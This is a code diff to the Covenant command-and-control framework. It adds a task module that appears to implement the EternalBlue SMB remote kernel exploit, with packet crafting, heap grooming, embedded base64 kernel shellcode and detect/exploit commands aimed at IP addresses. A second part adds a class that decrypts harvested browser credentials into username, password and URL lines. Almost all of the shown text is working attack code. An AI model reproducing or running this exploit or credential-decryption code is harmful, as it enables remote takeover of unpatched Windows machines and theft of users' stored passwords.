+ //initial trans2 request
+ byte[] trans_pkt_nulled = MakeSMB1Trans2ExploitPacket(header.TID, header.UID, "eb_trans2_zero", 0);
+
+ //Send all but the last packet
+ for (int i = 1; i <= 14; i++)
+ {
+ byte[] temp = MakeSMB1Trans2ExploitPacket(header.TID, header.UID, "eb_trans2_buffer", i);
+ trans_pkt_nulled = trans_pkt_nulled.Concat(temp).ToArray();
+ }
+ //Create SMB1 Echo packet
+ byte[] echo = MakeSMB1EchoPacket(header.TID, header.UID);
+ trans_pkt_nulled = trans_pkt_nulled.Concat(echo).ToArray();
+ SendSMBMessage(sock, trans_pkt_nulled, false);
+
+ return ReceiveSMBMessage(sock);
+ }
+
+ static public byte[] MakeSMB1FreeHoleSessionPacket(byte[] flags2, byte[] vcnum, byte[] native_os)
+ {
+ byte[] pkt = { 0xff, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, flags2[0], flags2[1], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00, 0x00, 0x04, 0x11, 0x0a, 0x00, vcnum[0], vcnum[1], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x16, 0x00, native_os[0], native_os[1], native_os[2], native_os[3], native_os[4] };
+ byte[] rest = Enumerable.Repeat((byte)0x00, 17).ToArray();
+ pkt = pkt.Concat(rest).ToArray();
+ return pkt;
+ }
+
+ static public Socket SMB1FreeHole(string ip, int port, bool start)
+ {
+ TcpClient client = new TcpClient(ip, port);
+ Socket sock = client.Client;
+ ClientNegotiate(sock);
+ byte[] pkt;
+ if (start)
+ {
+ byte[] flags2 = { 0x07, 0xc0 };
+ byte[] vcnum = { 0x2d, 0x01 };
+ byte[] native_os = { 0xf0, 0xff, 0x00, 0x00, 0x00 };
+ pkt = MakeSMB1FreeHoleSessionPacket(flags2, vcnum, native_os);
+ }
+ else
+ {
+ byte[] flags2 = { 0x07, 0x40 };
+ byte[] vcnum = { 0x2c, 0x01 };
+ byte[] native_os = { 0xf8, 0x87, 0x00, 0x00, 0x00 };
+ pkt = MakeSMB1FreeHoleSessionPacket(flags2, vcnum, native_os);
+ }
+
+ SendSMBMessage(sock, pkt, true);
+ ReceiveSMBMessage(sock);
+ return sock;
+ }
+
+ static public List SMB2Grooms(string ip, int port, int grooms, byte[] payload_hdr_pkt, List groom_socks)
+ {
+ for (int i = 0; i < grooms; i++)
+ {
+ TcpClient client = new TcpClient(ip, port);
+ Socket gsock = client.Client;
+ groom_socks.Add(gsock);
+ SendSMBMessage(gsock, payload_hdr_pkt, false);
+ }
+ return groom_socks;
+ }
+
+ static public byte[] MakeSMB2PayLoadHeadersPacket()
+ {
+ byte[] pkt = { 0x00, 0x00, 0xff, 0xf7, 0xfe, 0x53, 0x4D, 0x42 };
+ byte[] tmp = Enumerable.Repeat((byte)0x00, 124).ToArray();
+ pkt = pkt.Concat(tmp).ToArray();
+ return pkt;
+ }
+
+ static public byte[] MakeSMB2PayloadBodyPacket(byte[] kernel_user_payload)
+ {
+ int pkt_max_len = 4204;
+ int pkt_setup_len = 497;
+ int pkt_max_payload = pkt_max_len - pkt_setup_len;
+ List pkt = new List();
+
+ pkt.AddRange(new List()
+ {
+ 0x00, 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00, 0x03, 0x00, 0x00, 0x00
+ });
+ pkt.AddRange(Enumerable.Repeat((byte)0x00, 28));
+ pkt.AddRange(new List()
+ {
+ 0x03,0x00,0x00,0x00
+ });
+ pkt.AddRange(Enumerable.Repeat((byte)0x00, 116));
+ //KI_USER_SHARED_DATA addresses
+ pkt.AddRange(new List()
+ { //64
+ 0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff
+ });
+ pkt.AddRange(Enumerable.Repeat((byte)0x00, 16));
+ pkt.AddRange(new List()
+ { //86
+ 0xc0,0xf0,0xdf,0xff,0xc0,0xf0,0xdf,0xff
+ });
+ pkt.AddRange(Enumerable.Repeat((byte)0x00, 196));
+
+ //payload address
+ pkt.AddRange(new List()
+ {
+ 0x90,0xf1,0xdf,0xff
+ });
+ pkt.AddRange(Enumerable.Repeat((byte)0x00, 4));
+ pkt.AddRange(new List()
+ {
+ 0xf0,0xf1,0xdf,0xff
+ });
+ pkt.AddRange(Enumerable.Repeat((byte)0x00, 64));
+ pkt.AddRange(new List()
+ {
+ 0xf0,0x01,0xd0,0xff,0xff,0xff,0xff,0xff
+ });
+ pkt.AddRange(Enumerable.Repeat((byte)0x00, 8));
+ pkt.AddRange(new List()
+ {
+ 0x00,0x02,0xd0,0xff,0xff,0xff,0xff,0xff,0x00
+ });
+ pkt = pkt.Concat(kernel_user_payload).ToList();
+
+ int j = pkt_max_payload - kernel_user_payload.Length;
+ pkt.Add(0x00);
+ /*
+ for (int i = 0; i < j; i++)
+ {
+ pkt.Add(0x00);
+ }
+ */
+ return pkt.ToArray();
+ }
+
+ static public byte[] customKernel()
+ {
+
+ string shellcodeb64_x86 = "YOgAAAAAW+gjAAAAuXYBAAAPMo17OTn4dBE5RQB0BolFAIlVCIn4MdIPMGHCJACNqwAQAADB7QzB5QyD7VDDuSMAAABqMA+hjtmOwWSLDUAAAACLYQRRnGDoAAAAAFvoy////4tFAIPAF4lEJCQxwJlC8A+wVQh1Erl2AQAAmYtFAA8w++gEAAAA+mGdw4tFAMHoDMHgDC0AEAAAZoE4TVp19IlFBLh4fPTb6NMAAACXuD9fZHdX6McAAAAp+InBPXABAAB1A4PACI1YHI00H2ShJAEAAIs2ifIpwoH6AAQAAHfyUrjhFAEX6JsAAACLQAqNUASNNA/oywAAAD1aavrBdA492IPgPnQHizwXKdfr44l9DI0cH411EF+LWwS4Pkz4zuhhAAAAi0AKPKB3AiwIKfiDfAP8AHThMcBVagFVUOgAAAAAgQQkkgAAAFBTKTwkVrjEXBlt6CUAAAAxwFBQUFa4NEbMr+gVAAAAhcB0qotFHIB4DgF0B4kAiUAE65rD6AIAAAD/4GCLbQSXi0U8i1QFeAHqi0oYi1ogAetJizSLAe7oHQAAADn4dfGLWiQB62aLDEuLWhwB64sEiwHoiUQkHGHDUjHAmazByg0BwoXAdfaSWsNYiUQkEFhZWFpgUlGLKDHAZKIkAAAAmbBAUMHgBlBUUokRUUpSuOqZblfoe////4XAdU9YizjoAAAAAF6DxlW5AAQAAPOki0UMULhIuBi46Fb///+LQAyLQBSLAGaDeCQYdfeLUCiBegwzADIAdeuLWBCJXQS4XlFeg+gy////WYkBMcCIRQhAZKIkAAAAYcNaWFhZUVFR6AAAAACDBCQJUVFS/+A=";
+
+ string shellcodeb64_x64 = "VeguAAAAuYIAAMAPMkyNDTQAAABEOch0GTlFAHQKiVUEiUUAxkX4AEmRUFpIweogDzBdw0iNLQAQAABIwe0MSMHlDEiD7XDDDwH4ZUiJJCUQAAAAZUiLJCWoAQAAaitl/zQlEAAAAFBQVejF////SItFAEiDwB9IiUQkEFFSQVBBUUFSQVMxwLIB8A+wVfh1FLmCAADAi0UAi1UEDzD76A4AAAD6QVtBWkFZQVhaWV1Yw0FXQVZXVlNQTIt9AEnB7wxJwecMSYHvABAAAGZBgT9NWnXxTIl9CGVMizQliAEAAL94fPTb6AEBAABIkb8/X2R36PwAAACLQAOJwz0ABAAAcgODwBBIjVAoTI0EEU2JwU2LCU05yA+ExgAAAEyJyEwp8Eg9AAcAAHfmTSnOv+EUARfouwAAAIt4A4PHCEiNNBno9AAAAD1aavrBdBA92IPgPnQJSIsMOUgp+evgv0i4GLjohAAAAEiJRfBIjTQRSInzSItbCEg53nT3So0UM78+TPjO6GkAAACLQANIg3wC+AB03kiNTRBNMcBMjQ2pAAAAVWoBVUFQSIPsIL/EXBlt6DUAAABIjU0QTTHJvzRGzK/oJAAAAEiDxECFwHSjSItFIIB4GgF0CUiJAEiJQAjrkFhbXl9BXkFfw+gCAAAA/+BTUVZBi0c8QYuEB4gAAABMAfhQi0gYi1ggTAH7/8mLNItMAf7oHwAAADn4de9Yi1gkTAH7ZosMS4tYHEwB+4sEi0wB+F5ZW8NSMcCZrMHKDQHChcB19pJaw1VTV1ZBV0mLKEyLfQhSXkyJyzHARA8iwEiJAonBSPfRSYnAsEBQweAGUEmJAUiD7CC/6pluV+hl////SIPEMIXAdUVIiz5IjTVNAAAAuQAGAADzpEiLRfBIi0AYSItAIEiLAGaDeEgYdfZIi1BQgXoMMwAyAHXpTIt4IL9eUV6D6CL///9IiQMxyYhN+LEBRA8iwUFfXl9bXcNIkjHJUVFJiclMjQUNAAAAicpIg+wg/9BIg8Qwww==";
+ byte[] shellcode = Convert.FromBase64String(shellcodeb64_x64);
+ return shellcode;
+ }
+
+ static public byte[] MakeKernelUserPayload(byte[] ring3)
+ {
+
+ byte[] shellcode = customKernel();
+ byte[] length = BitConverter.GetBytes((UInt16)ring3.Length);
+ shellcode = shellcode.Concat(length).ToArray();
+ shellcode = shellcode.Concat(ring3).ToArray();
+ return shellcode;
+ }
+
+
+
+
+
+ static bool Detect(string target)
+ {
+ string ip = target;
+ int port = 445;
+
+ try
+ {
+ TcpClient client = new TcpClient(ip, port);
+ Socket sock = client.Client;
+
+ ClientNegotiate(sock);
+ byte[] response = SMB1AnonymousLogin(sock);
+ output += Environment.NewLine +"Trying to detect version of Windows running on " + target + " ...";
+ DetectVersionOfWindows(response);
+
+ SMB_HEADER header = SMB_HeaderFromBytes(response);
+ TreeConnectAndXRequest(ip, sock, header.UID);
+
+ //This is checked with userid 2049 and not 2048
+ bool vulnerable = CheckVulnerability(sock);
+ if (vulnerable)
+ {
+ output += Environment.NewLine +target + " appears to be vulnerable!";
+ sock.Close();
+ client.Close();
+ return true;
+ }
+ else
+ {
+ output += Environment.NewLine +"IP: " + target + " does not appears to be vulnerable!";
+ sock.Close();
+ client.Close();
+ }
+ }
+ catch
+ {
+ return false;
+ }
+ return false;
+ }
+
+ static void Exploit(string target,byte[] buffer)
+ {
+ string ip = target;
+ int port = 445;
+ int grooms = 12;
+
+ TcpClient client = new TcpClient(ip, port);
+ Socket sock = client.Client;
+
+ output += Environment.NewLine + "buffer length: " + buffer.Length;
+
+ byte[] shellcode = MakeKernelUserPayload(buffer);
+ byte[] payload_hdr_pkt = MakeSMB2PayLoadHeadersPacket();
+ byte[] payload_body_pkt = MakeSMB2PayloadBodyPacket(shellcode);
+
+ output += Environment.NewLine +"Trying to exploit: " + target;
+ ClientNegotiate(sock);
+ byte[] response = SMB1AnonymousLogin(sock);
+ SMB_HEADER header = SMB_HeaderFromBytes(response);
+ response = TreeConnectAndXRequest(ip, sock, header.UID);
+ header = SMB_HeaderFromBytes(response);
+ sock.ReceiveTimeout = 2000;
+ output += Environment.NewLine +"Connection established for exploitation.";
+
+ output += Environment.NewLine +"Creating a large SMB1 buffer... All but last fragment of exploit packet";
+ SMB1LargeBuffer(header, sock);
+ Socket fhs_sock = SMB1FreeHole(ip, port, true);
+
+ output += Environment.NewLine +"Grooming...";
+ List grooms_socks = new List();
+ grooms_socks = SMB2Grooms(ip, port, grooms, payload_hdr_pkt, grooms_socks);
+ Socket fhf_sock = SMB1FreeHole(ip, port, false);
+ fhs_sock.Close();
+ grooms_socks = SMB2Grooms(ip, port, 6, payload_hdr_pkt, grooms_socks);
+ fhf_sock.Close();
+
+ output += Environment.NewLine +"Ready for final exploit...";
+ byte[] final_exploit_pkt = MakeSMB1Trans2ExploitPacket(header.TID, header.UID, "eb_trans2_exploit", 15);
+
+ try
+ {
+ SendSMBMessage(sock, final_exploit_pkt, false);
+ response = ReceiveSMBMessage(sock);
+ header = new SMB_HEADER();
+ header = SMB_HeaderFromBytes(response);
+ }
+ catch (Exception e)
+ {
+ output += Environment.NewLine +"Socket error, this might end badly" + e.Message;
+ }
+
+ output += Environment.NewLine +"Sending exploits with the grooms";
+ foreach (Socket s in grooms_socks)
+ {
+ SendSMBMessage(s, payload_body_pkt.Take(2920).ToArray(), false);
+ }
+ foreach (Socket s in grooms_socks)
+ {
+ SendSMBMessage(s, payload_body_pkt.Skip(2920).ToArray(), false);
+ }
+ foreach (Socket s in grooms_socks)
+ {
+ s.Close();
+ }
+ output += Environment.NewLine +"Exploit send successfully...";
+ client.Close();
+ sock.Close();
+ }
+
+ public static string Execute(string Command,string payload)
+ {
+ try
+ {
+ string[] args = Command.Split(' ');
+ if (args[0] == "detect")
+ {
+ Detect(args[1]);
+ return output;
+ }
+ else
+ {
+ try
+ {
+ Exploit(args[1], Convert.FromBase64String(payload));
+ }
+ catch(Exception e)
+ {
+ return e.Message;
+ }
+
+ }
+ return output;
+ }
+ catch(Exception x)
+ {
+ return x.Message;
+ }
+ }
+ }
+
+ TaskingType: Assembly
+ UnsafeCompile: false
+ TokenTask: false
+ Options:
+ - Name: Command
+ Value: ''
+ DefaultValue: ''
+ Description: command , exploit or detect and ip address
+ SuggestedValues: ['exploit 192.168.1.69','detect 192.168.4.20']
+ Optional: true
+ DisplayInCommand: true
+ FileOption: false
+ - Name: payload
+ Value: ''
+ DefaultValue: ''
+ Description: shellcode
+ SuggestedValues: []
+ Optional: true
+ DisplayInCommand: false
+ FileOption: true
+ ReferenceAssemblies:
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Configuration.Install.dll
+ Location: net35\System.Configuration.Install.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.Data.DataSetExtensions.dll
+ Location: net35\System.Data.DataSetExtensions.dll
+ DotNetVersion: Net35
+ - Name: System.Data.dll
+ Location: net35\System.Data.dll
+ DotNetVersion: Net35
+ - Name: System.DirectoryServices.AccountManagement.dll
+ Location: net35\System.DirectoryServices.AccountManagement.dll
+ DotNetVersion: Net35
+ - Name: System.DirectoryServices.dll
+ Location: net35\System.DirectoryServices.dll
+ DotNetVersion: Net35
+ - Name: System.DirectoryServices.Protocols.dll
+ Location: net35\System.DirectoryServices.Protocols.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.Drawing.dll
+ Location: net35\System.Drawing.dll
+ DotNetVersion: Net35
+ - Name: System.IdentityModel.dll
+ Location: net35\System.IdentityModel.dll
+ DotNetVersion: Net35
+ - Name: System.Management.Automation.dll
+ Location: net35\System.Management.Automation.dll
+ DotNetVersion: Net35
+ - Name: System.Management.dll
+ Location: net35\System.Management.dll
+ DotNetVersion: Net35
+ - Name: System.Security.dll
+ Location: net35\System.Security.dll
+ DotNetVersion: Net35
+ - Name: System.ServiceProcess.dll
+ Location: net35\System.ServiceProcess.dll
+ DotNetVersion: Net35
+ - Name: System.Web.Extensions.dll
+ Location: net35\System.Web.Extensions.dll
+ DotNetVersion: Net35
+ - Name: System.Windows.Forms.dll
+ Location: net35\System.Windows.Forms.dll
+ DotNetVersion: Net35
+ - Name: System.XML.dll
+ Location: net35\System.XML.dll
+ DotNetVersion: Net35
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Configuration.Install.dll
+ Location: net40\System.Configuration.Install.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: System.Data.DataSetExtensions.dll
+ Location: net40\System.Data.DataSetExtensions.dll
+ DotNetVersion: Net40
+ - Name: System.Data.dll
+ Location: net40\System.Data.dll
+ DotNetVersion: Net40
+ - Name: System.DirectoryServices.AccountManagement.dll
+ Location: net40\System.DirectoryServices.AccountManagement.dll
+ DotNetVersion: Net40
+ - Name: System.DirectoryServices.dll
+ Location: net40\System.DirectoryServices.dll
+ DotNetVersion: Net40
+ - Name: System.DirectoryServices.Protocols.dll
+ Location: net40\System.DirectoryServices.Protocols.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.Drawing.dll
+ Location: net40\System.Drawing.dll
+ DotNetVersion: Net40
+ - Name: System.IdentityModel.dll
+ Location: net40\System.IdentityModel.dll
+ DotNetVersion: Net40
+ - Name: System.Management.Automation.dll
+ Location: net40\System.Management.Automation.dll
+ DotNetVersion: Net40
+ - Name: System.Management.dll
+ Location: net40\System.Management.dll
+ DotNetVersion: Net40
+ - Name: System.Security.dll
+ Location: net40\System.Security.dll
+ DotNetVersion: Net40
+ - Name: System.ServiceProcess.dll
+ Location: net40\System.ServiceProcess.dll
+ DotNetVersion: Net40
+ - Name: System.Web.Extensions.dll
+ Location: net40\System.Web.Extensions.dll
+ DotNetVersion: Net40
+ - Name: System.Windows.Forms.dll
+ Location: net40\System.Windows.Forms.dll
+ DotNetVersion: Net40
+ - Name: System.XML.dll
+ Location: net40\System.XML.dll
+ DotNetVersion: Net40
+ EmbeddedResources: []
+
diff --git a/Covenant/Models/Covenant/Event.cs b/Covenant/Models/Covenant/Event.cs
index 98cd103d..66079c63 100644
--- a/Covenant/Models/Covenant/Event.cs
+++ b/Covenant/Models/Covenant/Event.cs
@@ -8,6 +8,14 @@
using System.ComponentModel.DataAnnotations.Schema;
using Covenant.Core;
+using System.Security.Cryptography;
+using System.Collections.Generic;
+using System.Text;
+using Org.BouncyCastle.Crypto.Engines;
+using Org.BouncyCastle.Crypto.Modes;
+using Org.BouncyCastle.Crypto.Parameters;
+using System.Linq;
+using static Donut.Helper;
namespace Covenant.Models.Covenant
{
@@ -24,7 +32,8 @@ public enum EventType
{
Normal,
Download,
- Screenshot
+ Screenshot,
+ Decrypt
}
public class Event : ILoggable
@@ -44,6 +53,96 @@ public class Event : ILoggable
public string ToLog(LogAction action) => $"Event|{action}|{this.Id}|{this.Time}|{this.Level}|{this.Type}|{this.Context}|{this.MessageHeader}";
}
+ public class DecryptEvent : Event
+ {
+
+ public string EncryptedOutput { get; set; } = "";
+ public string DecryptedOutput { get; set; } = "";
+
+ public int GruntCommandId { get; set; }
+ public DecryptEvent()
+ {
+ this.Type = EventType.Decrypt;
+ }
+
+ public bool Decrypt()
+ {
+
+ try
+ {
+
+ string[] lines = EncryptedOutput.Split(Environment.NewLine);
+
+
+ byte[] key = Convert.FromBase64String(lines[0]);
+
+
+ DecryptedOutput = "master key decrypted: " + lines[0] + Environment.NewLine;
+
+ DecryptedOutput += "username : password : url" + Environment.NewLine;
+ DecryptedOutput += "______________________________________________________" + Environment.NewLine;
+
+
+ foreach (string line in lines)
+ {
+ try
+ {
+ string username = line.Split(':')[0];
+
+ if(line.Split(':')[1].StartsWith("ENC_"))
+ {
+ byte[] payload = Convert.FromBase64String(line.Split(':')[1].Substring(4));
+ string password = Encoding.Default.GetString(AesGcmDecrypt(key, payload));
+
+ DecryptedOutput += username + " : " + password + " : " + line.Split(':')[2] + line.Split(':')[3];
+ DecryptedOutput += Environment.NewLine;
+ }
+ else
+ {
+
+ DecryptedOutput += username + " : " + line.Split(':')[1] + " : " + line.Split(':')[2] + line.Split(':')[3];
+ DecryptedOutput += Environment.NewLine;
+ }
+
+ }
+ catch (Exception)
+ {
+
+ }
+ }
+ }
+ catch (Exception x)
+ {
+
+ DecryptedOutput = x.Message + Environment.NewLine + EncryptedOutput;
+ }
+ return true;
+ }
+
+
+ public static byte[] AesGcmDecrypt( byte[] key, byte[] payload)
+ {
+
+ byte[] nonce = payload.Skip(3).Take(12).ToArray();
+ byte[] realPayload = payload.Skip(15).ToArray();
+
+
+ return AesGcmDecrypt(realPayload, key, nonce);
+ }
+
+ public static byte[] AesGcmDecrypt(byte[] payload, byte[] key, byte[] nonce)
+ {
+ var cipher = new GcmBlockCipher(new AesEngine());
+ cipher.Init(false, new AeadParameters(new KeyParameter(key), 128, nonce));
+
+ var clearBytes = new byte[cipher.GetOutputSize(payload.Length)];
+ int len = cipher.ProcessBytes(payload, 0, payload.Length, clearBytes, 0);
+ cipher.DoFinal(clearBytes, len);
+ return clearBytes;
+ }
+
+ }
+
public class DownloadEvent : Event
{
public enum DownloadProgress
@@ -115,5 +214,10 @@ public class DownloadEventContent : DownloadEvent
public class ScreenshotEventContent : ScreenshotEvent
{
public byte[] FileContents { get; set; }
+ }
+
+ public class DecryptEventContent : DecryptEvent
+ {
+ public string EncryptedOutput { get; set; }
}
}
diff --git a/Covenant/Models/CovenantContext.cs b/Covenant/Models/CovenantContext.cs
index d5d87e5b..fd562cf5 100644
--- a/Covenant/Models/CovenantContext.cs
+++ b/Covenant/Models/CovenantContext.cs
@@ -98,6 +98,8 @@ protected override void OnModelCreating(ModelBuilder builder)
builder.Entity().HasBaseType();
builder.Entity().HasBaseType();
+ builder.Entity().HasBaseType();
+
builder.Entity();
builder.Entity()